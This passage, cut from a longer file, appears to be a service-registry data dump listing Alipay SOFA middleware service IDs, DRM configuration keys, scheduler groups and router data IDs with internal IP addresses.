vice:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.data.KbDataFactoryReceiver:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.partner.PartnerManageFacade:1.0:mapitool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.settlement.common.service.facade.api.MerchantMigrationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@censor#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:reservecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchselfop.common.service.ooda.facade.darwin.MetricGroupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.dal.mcenter.auto.daointerface.McenterAccountLogDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.topUpUtil.TopUpUtilFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.payment.api.RefundOrderHisQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcdp.common.service.facade.delivery.DeliverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.agreement.spi.callback.PayAuthManageCallBackService:1.0:yeborder@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ireserve.facade.api.VirtualAccountOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.article.semiautomatic.ArticleSemiAutomaticService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.13.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.linka:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInMatchAllRequest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:antsecurity_mctcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.196.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:publicDomain_antdsr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.AcsAccountDRM.ignoreNos,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:aliminiabilityprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskConfigService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cssocial.common.service.facade.YqCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkcloudfunds.service.manage.manage.BusinessPlatformServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.facade.finfoappstore.FinfoAppstoreProdDemoInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillBillkeyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_CTUPOINT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fintradeguard.biz.money.core.TrusteePayEventHandleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.49.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acccenter.common.service.facade.integration.system.opm.OpmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.featureds.InsIopFeatureDsMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.facade.ShopCategoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbill.facade.common.api.PcreditMonthBillQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ufe.internal.facade.service.UfeRepositoryLoader:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.distinguishprod.common.service.facade.ResRecTypeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.141.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.channelrouter.service.facade.FoutNetworkModeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.138.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opensupport.common.service.facade.partner.PartnerCoBuildingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_fundboss_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.imif.opcenter.common.service.facade.api.MerchantPunishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.SendIvrService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.mq.MQSchemaRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.custview.facade.AlipayMerchantViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.mng.SiteFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.mpoint.facade.MpointMonthBillQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.isv.IsvCampTemplateManagerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.finauth.service.FundSignAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.common.AssetItemFeedbackInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.growth.GrowthTargetUserDecideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.query.IndexQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayCardBusinessRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secbianque.common.service.facade.IndicatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mitemcenter.common.service.facade.api.ItemInventoryPurchaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iaccenter.facade.query.api.TitleDailyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.accalogprocess.common.service.facade.AppGovernDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.bumng.common.service.facade.OrganizationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.common.webx.session.drm.SessionLogDrm.sessionDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finance.goldetfprod.common.service.facade.api.GoldWorkDayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_PCREDITCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromofront.facade.applet.api.PrizeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshysale.common.service.facade.meshycustomer.MeshyCustomerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.BatchTodoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.238#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openitemcore.common.service.facade.api.management.aegis.AegisOptHisMngFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.micloan.agdslibra.integration.creditcenter.CreditCenterLogQueryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegeocoding.common.service.facade.bizarea.MarKetingBizAreaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:metricAssertPublishProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dqsyncguard.facade.meta.MetaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.mitemcenter.common.service.facade.utils.ldc.ICLdcRzDrm.ldcRZoneOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.69.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksettlemng_largeRetention@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditauthcore.service.PcreditAuthUnsignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@frastress#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.tradeapcore:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ordermng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.secondaryBlackListValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.212.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.antschedulerconsole.endpoint.facade.IActivityInstanceRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.186.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finscprod.facade.task.RuleValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:sdaxconnectplatform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ifxblade_processCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.46.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openeco.facade.serviceprovider.CamparePolymerToImaspDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.213.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.176.185#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitycap:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.infosec.common.service.facade.FastTextAnalyzeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.biz.delivery.rpc.VoucherRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.opssla.DrmOperationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.maxPartionCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bumng.common.service.facade.WriteBackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:antefi_finannafccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fppolicymng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.autooperate.MerchantInterestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.biz.service.facade.impl.onecent.manager.YebcWinListManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.158.216#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:webdemo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.249.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.discount.common.service.facade.DiscountConsultiveService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opencore:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.cashier.common.service.facade.api.PaymentViewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:overseaprod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Servers_TP_S_BIYUAN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.publiccore.biz.service.impl.rpc.tmlife.TmLifeRelationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.openBizUseScene,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.208.137#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.afsc.common.service.thor.service.ThorVariableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceExecutionCallback:1.0:tairmanager@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imif.common.service.facade.v2.ContactPersonManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.91.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.giftprod.common.service.facade.template.GiftCrowdHbTemplateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_BKBILLLEND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.iexpbizprod:name=com.alipay.zdal.ldc.tair.iWFBizProdCommonCacheTBaseCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudprovision:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.assets.api.facade.service.MetaDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.236.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openinsight.common.service.facade.rec.api.RecTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accordercore.common.service.facade.control.auth.api.MasterOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promokernel.common.biz.facade.api.TeamQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cfloancore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.AutoInsTradeFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.0.0.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finslip:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.membercenter.service.facade.LogonIdManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:findatacanal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciaasconnectorcore.facade.conn.SecuredZoneConn:1.0:0000000002@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.yunfengdieweb:name=com.alipay.chair.businessgray.drm.renderGray.renderOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_RCSERVCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.voucher.VcpVoucherQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.mobilehelp.common.service.facade.api.CommonServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-34#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchportalcore.common.service.activity.facade.biz.TcoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_PAROID_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchasset.common.service.facade.requirement.AssetRequirementProofingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataconsole.dr.zcache.ZcacheDrFacade:1.0:zcacheDrFacade-izdataconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrp.service.facade.UserPerInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filefactory.service.facade.FilePlatformBufferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.finsupport.component.cache.masterdata.drm.ResultStatusSwitchDRM.queryByBizResultStatusSwitchOn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iglobalfundcontrol.common.config.api.CityQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_TRANSFER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.166.74.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanCoreConfigDrm.paymentDtSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.deposit.api.ApplyEBankService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.dasaa.facade.asql.DasaaAsqlDatasourceDefFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.transaction.BizProcessQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MINITRANS#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.apportion.service.ApportionReportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.amspm.core.plugin.config.drm.BizIdentityConfigDrmResource.loadTestNullBizCodeBlockingUp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:kbshopdetail@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtaskcenter.common.service.facade.template.TaskGroupTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.midasCommonTair.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imnotify.api.client.MNotifyClientDAS:1.0:imnotify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.offer.AliyunProductMappingManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_EC_INSKGMNG_FUSION_DATA@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:wj@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_PRODTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_S_LIMIT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.contractMessageTransaction,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fingiftprodTairCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.38.44.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openaccess.facade.service.access.ProjectManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxconf.service.facade.ctrl.DataGroovyService:1.0:fluxconf@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csvoice.service.facade.api.ConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:openauth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableVsar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.common.query.QueryMigrationDataService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.voucherprod.facade.api.rule.VcpVoucherRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.oceanbase.obforumcore.service.activity.ActivityBrandFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.mif.common.service.facade.MerchantAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.vega-integration-kepler:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iexratecenter.common.service.integration.tbnotify.UniformEventClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfpcenter:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_O_FINCAPACITY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ebppcore.facade.query.AreaAdcodeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.DistributedLockService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:hedgeStrategyInstanceAutoExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.PmtUfrzProdWithStyCfgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobile.mdevsupport.facade.noticecenter.NoticeCenterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:antlogmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.college.CertificateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.catalog.CatalogWorkFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.218.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finmng.service.facade.ctrl.identifyTag.BizTagQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:tgrowthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.biz.dataview.service.RegulatoryTemplateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fporgassetcenter.common.service.facade.api.OrgArrMngServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilesearch.common.service.facade.LoadtestMockFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.drm7014#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.promoitem.common.manage.facade.api.ItemDataDictionaryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.mide.common.service.facade.api.entity.EntityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebAvailableCardListQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.tips.TipsTopicContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataconsole.dr.zcache.ZcacheDrFacade:1.0:zcacheDrFacade-izdataconsole@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.yooki.moon.facade.PepoleFacade:1.0:pepoleFacade1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.riskengine.facade.api.RiskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobilecodec.service.facade.CodeParseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.fininfo:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","mobileanti@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbasset.biz.shared.common.JobService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-TR-SERVICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.paychecker:name=com.alipay.zdal.ldc.tair.paycheckerCZTBaseCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appstore.common.service.facade.commodity.KBCommodityOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recadmin.common.service.facade.SceneManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finaicontentcore.api.yicai.YiCaiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.framodel.common.service.facade.api.IndicatorDataFacade:1.0@X